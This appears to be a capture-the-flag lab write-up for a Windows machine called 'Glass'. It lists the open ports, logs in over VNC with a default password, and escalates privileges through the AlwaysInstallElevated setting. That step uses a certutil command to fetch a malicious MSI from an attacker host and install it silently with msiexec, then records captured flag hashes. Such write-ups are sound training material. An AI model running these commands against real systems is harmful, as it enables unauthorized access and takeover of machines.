Info

  • Name – Glass
  • IP Address – 172.31.1.25

Enumeration

Open Ports

PortProtocolServiceVersion
123udpfilteredntp
135tcpmsrpcMicrosoft Windows RPC
137udpnetbios-nsMicrosoft Windows netbios-ns
138udpfilterednetbios-dgm
139tcpnetbios-ssnMicrosoft Windows netbios-ssn
445tcpmicrosoft-ds
500udpfilteredisakmp
3389tcpms-wbt-serverMicrosoft Terminal Services
4500udpfilterednat-t-ike
5800tcpvnc-httpTightVNC
5900tcpvncVNC

Exploitation

Exploit Details (Default Credentials)

  • Name – Default Credentials
  • CVE – N/A
  • Module – N/A
  • Disclosed – N/A
  • References
    • N/A

The password to VNC is currently set to ‘password’.

remmina -c vnc://$ip
password

Privilege Escalation

Exploit Details (Always Install Elevated Registry permission set)

  • Name – Always install elevated registry permission set
  • CVE – N/A
  • Module – N/A
  • Disclosed – N/A
  • References
    • N/A
certutil.exe -urlcache -f http://10.10.0.15/windows/privesc/shell.msi shell.msi
msiexec /quiet /qn /i shell.msi
whoami
type C:\Users\Administrator\Desktop\system.txt

Loot

access.txt - 6c872f27e7848097568abb0ca181e988
system.txt - 39065a2f433f9b7d3fbbcd6e4fbd0a8e